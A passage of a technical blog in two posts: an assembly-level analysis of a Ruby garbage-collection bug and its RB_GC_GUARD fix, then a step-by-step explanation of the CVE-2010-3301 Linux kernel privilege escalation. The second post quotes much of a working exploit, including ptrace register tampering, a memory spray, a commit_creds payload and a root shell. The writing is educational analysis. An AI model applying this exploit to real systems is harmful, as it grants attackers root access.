 cmp    $0x4,%rax   # compare return value (%rax) to nil
 jne    1170 [gzfile_read_raw_ensure+0x10] # if it is NOT nil jump to the good stuff

The return value of gzfile_read_raw_ensure (an address of a ruby object) is stored in rax.

And finally, the good stuff. The call to zstream_append_input:

  mov    0x10(%rax),%rdx # RSTRING_LEN(v) as 3rd arg
  mov    0x18(%rax),%rsi # RSTRING_PTR(v) as 2nd arg
  mov    %rbx,%rdi       # set gz->z as the 1st arg
  callq  10e0 [zstream_append_input]  # let it rip

Note that the arguments to zstream_append_input are moved into registers by offsetting from rax and that when the call to zstream_append occurs, the ruby object returned from gzfile_read_raw_ensure is still stored in rax and not written to it's slot on the stack because the extra write is unnecessary.

stare into the abyss part 2

Aright, so the patch changes the zstream_append_input2 macro to this:

#define zstream_append_input2(z,v)\
    RB_GC_GUARD(v),\
    zstream_append_input((z), (Bytef*)RSTRING_PTR(v), RSTRING_LEN(v))

And, RB_GC_GUARD is defined as:

#define RB_GC_GUARD_PTR(ptr) \
    __extension__ ({volatile VALUE *rb_gc_guarded_ptr = (ptr); rb_gc_guarded_ptr;})

#define RB_GC_GUARD(v) (*RB_GC_GUARD_PTR(&(v)))

That code is just a hack to mark the memory location holding v with the volatile type qualifier. This tells the compiler that memory backing v acts in ways that the compiler is too stupid to understand, so the compiler must ensure that reads and writes to this location are not optimized out.

A common usage of this qualifier is for memory mapped registers. Reads from memory mapped registers should not be optimized away since a hardware device may update the value stored at that location. The compiler wouldn't know when these updates could happen so it must make sure to re-read the value from this memory location when it is needed. Similarly, writes to memory mapped registers may modify the state of a hardware device and should not be optimized away.

Most of the code generated with the patch applied is the same as without except for a few slight differences before zstream_append_input is called. Let's take a look:

  mov    %rax,-0x18(%rbp)    # write str to the stack 
  mov    -0x18(%rbp),%rax    # read the value in str back to rax
  mov    0x10(%rcx),%rdx      # RSTRING_LEN(v)
  mov    0x18(%rcx),%rsi       # RSTRING_PTR(v)
  mov    %rbx,%rdi                # z
  callq  1f60 [_zstream_append_input]

The key difference is that the return value of gz_file_read_raw is written back to it's memory location (which, in this case, happens to be on the stack and is called str).

the bug

The bug is triggered because:

  1. The address of the ruby object str is stored in a caller saved register, rax.
  2. The callee (zstream_append_input) does not save the value of rax (it is not required to) and rax is overwritten in the function, leaving no references to the ruby object returned by gzfile_read_raw.
  3. The callee (zstream_append_input) eventually calls rb_newobj. rb_newobj may trigger a GC run, if there are no available objects on the freelist.
  4. The GC run finds the object returned by gzfile_read_raw but sees no references to it and frees the memory associated with it.
  5. The freed object is used as it were it were valid, and memory corruption occurs causing the VM to explode.

The patch prevents this bug from happening because:

  1. The address of the ruby object str is stored in a caller saved register, rax.
  2. The volatile type qualifier causes the compiler to generate code which writes the return value back into it's memory location on the stack.
  3. The callee (zstream_append_input) eventually calls rb_newobj. rb_newobj may trigger a GC run, if there are no available objects on the freelist.
  4. The GC run finds the object returned by gzfile_read_raw and finds a reference to it and therefore does not free it.
  5. Everyone is happy.

The general case

Given valid C code, gcc will generate machine instructions that correctly do what you want. Of course, there are bugs in gcc just like any other piece of software. The problem in this case is not gcc. The problem is that the object and garbage collection implementations in REE/MRI/YARV are not valid C code, so it is not possible for gcc to generate machine instructions that do the right thing. In other words, Ruby's object and GC implementations are breaking their contract with gcc.

The end result is the need for shit like RB_GC_GUARD in REE/MRI/YARV and also in Ruby gems to selectively paper over valid gcc optimizations. Having an API that might cause the Ruby VM to fucking explode unless you proactively mark things with RB_GC_GUARD is not on the path of least resistance toward building a maintainable, safe, and performant system. Very few people out there know that the volatile type qualifier exists, let alone what it does. Essentially, this means that authors of Ruby gems must understand how GC works in the VM to prevent their gems from causing GC to break the universe.

That is fucking beyond stupid.

How to detect this bug class

This could be detected by building a simple static analysis tool. You won't catch 100% of cases, and you will definitely have false positives, but it is better than nothing. Something like this should work:

  1. Build a call digraph of the VM and/or the set of gems you care about.
  2. Find all paths leading to the rb_newobj sink.
  3. Find all paths which call rb_newobj, but do not save rax prior to making another function call which is also on a path to rb_newobj.
  4. The functions found are very likely to be causing corruption. A human will need to examine the found cases to weed out false positives and to fix the code.

If you have found yourself wondering who the fuck would write such a test? it is important for you to note that rtld in Linux does not save the SSE registers (which are supposed to be caller saved) prior to entering the fixup function, however to ensure that such an optimization does not cause the fucking universe to come crashing down, a test ships with the code to run objdump after building the binary. The objdump output is then grepped for any instructions which might modify the SSE registers. As long as no one touches the SSE registers, there is no need to save and restore them.

If Ruby's object and GC subsystems want to prevent the universe from exploding, it must supply an equivalent test to ensure that corruption is impossible.

Conclusion

  • MRI/YARV/REE are inherently fatally flawed.
  • I'm never writing another Ruby-related blog post.
  • I'm not a Ruby programmer.

No comments

I'm taking a page from the book of coda and disabling comments. If you got something to say, write a blog post.

If you enjoyed this article, subscribe (via RSS or e-mail) and follow me on twitter.

References

  1. System V Application Binary Interface: AMD64 Architecture Processor Supplement []

Written by Joe Damato

July 5th, 2011 at 6:00 am

detailed explanation of a recent privilege escalation bug in linux (CVE-2010-3301)

View Comments


If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.

tl;dr

This article is going to explain how a recent privilege escalation exploit for the Linux kernel works. I’ll explain what the deal is from the kernel side and the exploit side.

This article is long and technical; prepare yourself.

ia32 syscall emulation

There are two ways to invoke system calls on the Intel/AMD family of processors:

  1. Software interrupt 0x80.
  2. The sysenter family of instructions.

The sysenter family of instructions are a faster syscall interface than the traditional int 0x80 interface, but aren’t available on some older 32bit Intel CPUs.

The Linux kernel has a layer of code to allow syscalls executed via int 0x80 to work on newer kernels. When a system call is invoked with int 0x80, the kernel rearranges state to pass off execution to the desired system call thus maintaing support for this older system call interface.

This code can be found at http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L380. We will examine this code much more closely very soon.

ptrace(2) and the ia32 syscall emulation layer

From the ptrace(2) man page (emphasis mine):

The ptrace() system call provides a means by which a parent process may observe and control the execution of another process, and examine and change its core image and registers. It is primarily used to implement break-point debugging and system call tracing.

If we examine the IA32 syscall emulation code we see some code in place to support ptrace1:

ENTRY(ia32_syscall)
/* . . . */
        GET_THREAD_INFO(%r10)
          orl $TS_COMPAT,TI_status(%r10)
        testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%r10)
        jnz ia32_tracesys

This code is placing a pointer to the thread control block (TCB) into the register r10 and then checking if ptrace is listening for system call notifications. If it is, a secondary code path is entered.

Let’s take a look2:

ia32_tracesys:                   
        /* . . . */
        call syscall_trace_enter
        LOAD_ARGS32 ARGOFFSET  /* reload args from stack in case ptrace changed it */
        RESTORE_REST
        cmpl $(IA32_NR_syscalls-1),%eax
        ja  int_ret_from_sys_call       /* ia32_tracesys has set RAX(%rsp) */
        jmp ia32_do_call
END(ia32_syscall)

Notice the LOAD_ARGS32 macro and comment above. That macro reloads register values after the ptrace syscall notification has fired. This is really fucking important because the userland parent process listening for ptrace notifications may have modified the registers which were loaded with data to correctly invoke a desired system call. It is crucial that these register values are untouched to ensure that the system call is invoked correctly.

Also take note of the sanity check for %eax: cmpl $(IA32_NR_syscalls-1),%eax

This check is ensuring that the value in %eax is less than or equal to (number of syscalls – 1). If it is, it executes ia32_do_call.

Let’s take a look at the LOAD_ARGS32 macro3:

.macro LOAD_ARGS32 offset, _r9=0
/* . . . */
movl \offset+40(%rsp),%ecx
movl \offset+48(%rsp),%edx
movl \offset+56(%rsp),%esi
movl \offset+64(%rsp),%edi
.endm

Notice that the register %eax is left untouched by this macro, even after the ptrace parent process has had a chance to modify its contents.

Let’s take a look at ia32_do_call which actually transfers execution to the system call4:

ia32_do_call:
        IA32_ARG_FIXUP
        call *ia32_sys_call_table(,%rax,8) # xxx: rip relative

The system call invocation code is calling the function whose address is stored at ia32_sys_call_table[8 * %rax]. That is, the (8 * %rax)th entry in the ia32_sys_call_table.

subtle bug leads to sexy exploit

This bug was originally discovered by the polish hacker “cliph” in 2007, fixed, but then reintroduced accidentally in early 2008.

The exploit is made by possible by three key things:

  1. The register %eax is not touched in the LOAD_ARGS macro and can be set to any arbitrary value by a call to ptrace.
  2. The ia32_do_call uses %rax, not %eax, when indexing into the ia32_sys_call_table.
  3. The %eax check (cmpl $(IA32_NR_syscalls-1),%eax) in ia32_tracesys only checks %eax. Any bits in the upper 32bits of %rax will be ignored by this check.

These three stars align and allow an attacker cause an integer overflow in ia32_do_call causing the kernel to hand off execution to an arbitrary address.

Damnnnnn, that’s hot.

the exploit, step by step

The exploit code is available here and was written by Ben Hawkes and others.

The exploit begins execution by forking and executing two copies of itself:

        if ( (pid = fork()) == 0) {
                ptrace(PTRACE_TRACEME, 0, 0, 0);
                execl(argv[0], argv[0], "2", "3", "4", NULL);
                perror("exec fault");
                exit(1);
        }

The child process is set up to be traced with ptrace by setting the PTRACE_TRACEME.

The parent process enters a loop:

        for (;;) {
                if (wait(&status) != pid)
                        continue;

                /* ... */
                
                rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
                if (rax == 0x000000000101) {
                        if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) {
                                printf("PTRACE_POKEUSER fault\n");
                                exit(1);
                        }
                        set = 1;
                }
 
                /* ... */
 
                if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) {
                        printf("PTRACE_SYSCALL fault\n");
                        exit(1);
                }
         }

The parents calls wait and blocks until entry into a system call. When a system call is entered, ptrace is invoked to read the value of the rax register. If the value is 0x101, ptrace is invoked to set the value of rax to 0x800000101 to cause an overflow as we’ll see shortly. ptrace is then invoked to resume execution in the child.

While this is happening, the child process is executing. It begins by looking the address of two symbols in the kernel:

	commit_creds = (_commit_creds) get_symbol("commit_creds");
	/* ... */

	prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
       /* ... */

Next, the child process attempts to create an anonymous memory mapping using mmap:

        if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,
                MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
          /* ... */            

This mapping is created at the address tmp. tmp is set earlier to: 0xffffffff80000000 + (0x0000000800000101 * 8) (stored in kern_s in main).

This value actually causes an overflow, and wraps around to: 0x3f80000808. mmap only creates mappings on page-aligned addresses, so the mapping is created at: 0x3f80000000. This mapping is 64 megabytes large (stored in size).

Next, the child process writes the address of a function called kernelmodecode which makes use of the symbols commit_creds and prepare_kernel_cred which were looked up earlier:

int kernelmodecode(void *file, void *vma)
{
	commit_creds(prepare_kernel_cred(0));
	return -1;
}

The address of that function is written over and over to the 64mb memory that was mapped in:

        for (; (uint64_t) ptr < (tmp + size); ptr++)
                *ptr = (uint64_t)kernelmodecode;

Finally, the child process executes syscall number 0x101 and then executes a shell after the system call returns:

        __asm__("\n"
        "\tmovq $0x101, %rax\n"
        "\tint $0x80\n");
 
        /* . . . */
        execl("/bin/sh", "bin/sh", NULL);

tying it all together

When system call 0x101 is executed, the parent process (described above) receives a notification that a system call is being entered. The parent process then sets rax to a value which will cause an overflow: 0x800000101 and resumes execution in the child.

The child executes the erroneous check described above:

        cmpl $(IA32_NR_syscalls-1),%eax
        ja  int_ret_from_sys_call       /* ia32_tracesys has set RAX(%rsp) */
        jmp ia32_do_call

Which succeeds, because it is only comparing the lower 32bits of rax (0x101) to IA32_NR_syscalls-1.

Next, execution continues to ia32_do_call, which causes an overflow, since rax contains a very large value.

call *ia32_sys_call_table(,%rax,8)

Instead of calling the function whose address is stored in the ia32_sys_call_table, the address is pulled from the memory the child process mapped in, which contains the address of the function kernelmodecode.

kernelmodecode is part of the exploit, but the kernel has access to the entire address space and is free to begin executing code wherever it chooses. As a result, kernelmodecode executes in kernel mode setting the privilege level of the process to those of init.

The system has been rooted.

The fix

The fix is to zero the upper half of eax and change the comparison to examine the entire register. You can see the diffs of the fix here and here.

Conclusions

  • Reading exploit code is fun. Sometimes you find particularly sexy exploits like this one.
  • The IA32 syscall emulation layer is, in general, pretty wild. I would not be surprised if more bugs are discovered in this section of the kernel.
  • Code reviews play a really important part of overall security for the Linux kernel, but subtle bugs like this are very difficult to catch via code review.
  • I'm not a Ruby programmer.

If you enjoyed this article, subscribe (via RSS or e-mail) and follow me on twitter.

References

  1. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L424 []
  2. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L439 []
  3. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L50 []
  4. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L430 []

Written by Joe Damato

September 27th, 2010 at 4:59 am